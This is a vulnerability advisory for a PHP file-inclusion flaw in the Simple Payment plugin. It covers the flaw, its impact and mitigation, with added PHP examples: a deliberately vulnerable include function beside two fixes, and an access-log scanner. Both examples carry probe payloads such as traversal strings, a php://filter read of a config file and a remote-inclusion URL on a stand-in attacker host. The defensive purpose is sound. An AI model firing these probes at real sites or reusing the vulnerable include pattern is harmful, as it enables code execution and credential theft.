CVE-2025-62075 in Simple Payment Plugin
Summary
by MITRE • 11/06/2025
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ido Kobelkowsky Simple Payment simple-payment. This issue affects Simple Payment: from n/a through <= 2.4.6.
Analysis
by VulDB Data Team • 11/08/2025
CVE-2025-62075 is a PHP file inclusion flaw in the Simple Payment plugin, affecting version 2.4.6 and earlier. The plugin passes attacker-influenced input into a PHP include or require statement without validating it against the set of files it actually intends to load, so a request can choose which file the server executes. The MITRE summary labels the weakness "PHP Remote File Inclusion"; in practice CWE-98 covers both the remote and the local variant. Pulling a file over http:// from an attacker-controlled host requires allow_url_include=On, which has been Off by default since PHP 5.2, but the same bug is routinely exploited against a default configuration through directory traversal, php:// stream wrappers, or a file the attacker was previously able to place on the server. Either route ends in execution of attacker-chosen PHP.
The weakness is CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program), and the adversary behaviour is ATT&CK technique T1190, Exploit Public-Facing Application. Mechanically, a request parameter is concatenated into the argument of include or require without a check that the result names one of the plugin's own files; whoever controls that parameter controls the path, and PHP executes whatever it resolves to. When the attacker controls the beginning of the string, PHP's stream wrappers are honoured as well, which is what turns a remote URL into a usable include target on hosts that permit it.
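The pattern described above in miniature, as an added example rather than code from the Simple Payment plugin (the advisory does not publish the vulnerable routine). The vulnerable function sits next to the two fixes that close it: an allowlist lookup and a realpath containment check. Function names, the templates/ directory layout and the probe inputs are all assumptions made for the example.

```php
<?php
// Added example, not code from the Simple Payment plugin: the CWE-98 shape in
// miniature, next to two ways of closing it. Function and template names are
// hypothetical.

// VULNERABLE. The request value forms the *start* of the include() argument,
// so PHP honours whatever it finds there: "../../config" (traversal),
// "php://filter/..." (stream wrapper) or, if allow_url_include=On,
// "http://attacker.example/shell" (remote file inclusion).
function render_vulnerable(string $template): string
{
    ob_start();
    include $template . '.php';            // user input decides which file runs
    return (string) ob_get_clean();
}

// FIX 1: allowlist. A short key selects one of a fixed set of files; the
// request value never takes part in path arithmetic at all.
const TEMPLATES = [
    'checkout' => 'checkout.php',
    'receipt'  => 'receipt.php',
];

function resolve_template(string $key): ?string
{
    return TEMPLATES[$key] ?? null;        // exact match or nothing
}

// FIX 2: containment. For code that discovers files at runtime and cannot use
// a static table: reject anything carrying a URL scheme, resolve the path, and
// require the result to sit under $baseDir.
function safe_template_path(string $baseDir, string $name): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $name)) {
        return null;                       // http://, php://, data:, phar:// ...
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name);
    if ($base === false || $path === false) {
        return null;                       // unresolvable path or missing file
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // resolved outside the template dir
    }
    return $path;
}

// Self-check against a throwaway directory layout built here for the example:
//   $dir/templates/checkout.php   (legitimate)
//   $dir/secret.php               (must never be reachable)
$dir = sys_get_temp_dir() . '/cwe98_demo_' . getmypid();
mkdir($dir . '/templates', 0700, true);
file_put_contents($dir . '/templates/checkout.php', "checkout ok\n");
file_put_contents($dir . '/secret.php', "SECRET\n");

$probes = [
    'checkout',
    'checkout.php',
    '../secret.php',
    'php://filter/convert.base64-encode/resource=../secret.php',
    'http://attacker.example/shell',
];
printf("%-62s %-12s %s\n", 'input', 'allowlist', 'containment');
foreach ($probes as $p) {
    $byList = resolve_template($p) ?? 'REJECTED';
    $byPath = safe_template_path($dir . '/templates', $p);
    printf("%-62s %-12s %s\n", $p, $byList, $byPath === null ? 'REJECTED' : basename($byPath));
}

// Remove the scratch directory again.
unlink($dir . '/templates/checkout.php');
unlink($dir . '/secret.php');
rmdir($dir . '/templates');
rmdir($dir);
```

Run it with `php example.php`. Only the bare key "checkout" passes the allowlist, and only the real file name "checkout.php" passes containment; traversal, the php:// wrapper and the remote URL are refused by both. The allowlist is the fix to prefer because it never lets request data near the file system; the containment check is the fallback for code that genuinely needs dynamic file names, and it relies on realpath resolving symlinks and ".." on both sides of the comparison.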
The impact is remote code execution in the context of the web server's PHP process: an attacker who can get a file of their choosing included can run arbitrary PHP, read the site's configuration and database credentials, drop a persistent backdoor, or pivot further into the hosting environment. All versions of Simple Payment up to and including 2.4.6 are affected. The attack surface is the plugin's HTTP-facing code, so exploitation needs no local access; the summary does not state whether an authenticated account is required, so treat the flaw as reachable by unauthenticated requests until the vendor says otherwise.
Mitigation: update Simple Payment to a release later than 2.4.6 as soon as one is available. The summary gives only the affected range and does not name the fixed version, so confirm the fix against the plugin's changelog rather than assuming the next version number; until then, restrict access to the plugin's endpoints or disable it. On the PHP side, verify that allow_url_include is Off (the default) and keep allow_url_fopen Off where nothing else needs it; that removes the remote variant even while the code is still vulnerable, though not the local one. A web application firewall can block the obvious indicators (URL schemes, php:// wrappers, or ../ sequences in parameter values), but treat it as a stopgap, since encoding variants get past naive rules. Monitor access logs for include-style parameters carrying URLs, wrappers or traversal sequences, and check the web root for PHP files that nobody deployed. The correct code fix is to stop building include paths from request data: map the request value to a fixed allowlist of file names, or at minimum resolve the path with realpath and verify that it stays inside the intended directory.
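A scanner for the log indicators the mitigation paragraph mentions, as an added example that is not part of the advisory or the plugin. The log lines are constructed for this example, and the endpoint and parameter names (/checkout/, tpl, page) are hypothetical; because the advisory does not name the vulnerable parameter, every query parameter is inspected.

```php
<?php
// Added example, not from the advisory or the plugin: a scanner for the
// include-abuse patterns in combined-format access logs. Log lines are
// constructed; endpoint and parameter names are hypothetical.

// Indicators evaluated after URL decoding. 'null_byte' covers the old
// "%00 truncates the appended .php" trick, still worth flagging as recon.
const INDICATORS = [
    'remote_url'  => '#\b(?:https?|ftps?)://#i',
    'php_wrapper' => '#\b(?:php|phar|zip|glob|expect|file)://|\bdata:#i',
    'traversal'   => '#(?:^|[/\\\\])\.\.(?:[/\\\\]|$)#',
    'null_byte'   => '#\x00#',
];

// Pull the request target out of a combined-format (Apache/nginx) log line.
function request_target(string $line): ?string
{
    if (!preg_match('#"(?:GET|POST|HEAD|PUT) ([^"\s]+) HTTP/[0-9.]+"#', $line, $m)) {
        return null;
    }
    return $m[1];
}

// Query string to name => value, decoded twice so that %2e%2e%2f and the
// double-encoded %252e%252e%252f both collapse to "../".
function query_params(string $target): array
{
    $q = strpos($target, '?');
    if ($q === false) {
        return [];
    }
    parse_str(substr($target, $q + 1), $params);       // first decode
    $out = [];
    foreach ($params as $name => $value) {
        if (is_string($value)) {
            $out[$name] = rawurldecode($value);         // second decode
        }
    }
    return $out;
}

// Returns one string per indicator hit, e.g. "remote_url in tpl=http://...".
function classify(string $line): array
{
    $target = request_target($line);
    if ($target === null) {
        return [];
    }
    $hits = [];
    foreach (query_params($target) as $name => $value) {
        foreach (INDICATORS as $label => $re) {
            if (preg_match($re, $value)) {
                // addcslashes renders control bytes (the null byte) visibly
                $hits[] = sprintf('%s in %s=%s', $label, $name, addcslashes($value, "\0..\37"));
            }
        }
    }
    return $hits;
}

// Constructed sample: one legitimate request followed by four probes.
$logLines = [
    '203.0.113.5 - - [06/Nov/2025:10:15:32 +0000] "GET /checkout/?tpl=checkout HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Nov/2025:10:16:01 +0000] "GET /checkout/?tpl=http://attacker.example/shell HTTP/1.1" 200 93 "-" "curl/8.4.0"',
    '198.51.100.7 - - [06/Nov/2025:10:16:05 +0000] "GET /checkout/?tpl=..%2F..%2F..%2Fconfig HTTP/1.1" 500 0 "-" "curl/8.4.0"',
    '198.51.100.7 - - [06/Nov/2025:10:16:09 +0000] "GET /checkout/?tpl=%252e%252e%252fconfig%2500 HTTP/1.1" 200 41 "-" "curl/8.4.0"',
    '198.51.100.7 - - [06/Nov/2025:10:16:12 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2201 "-" "curl/8.4.0"',
];

foreach ($logLines as $i => $line) {
    $hits = classify($line);
    if ($hits !== []) {
        printf("line %d: %s\n", $i + 1, implode('; ', $hits));
    }
}
```

The first line produces no hit; lines 2 to 5 are flagged as remote_url, traversal, traversal plus null_byte, and php_wrapper respectively. The double decode is deliberate: a single decode would leave the fourth line looking like "%2e%2e%2fconfig" and miss it. A response status of 200 on a traversal or wrapper probe deserves the most attention, since it suggests the include succeeded.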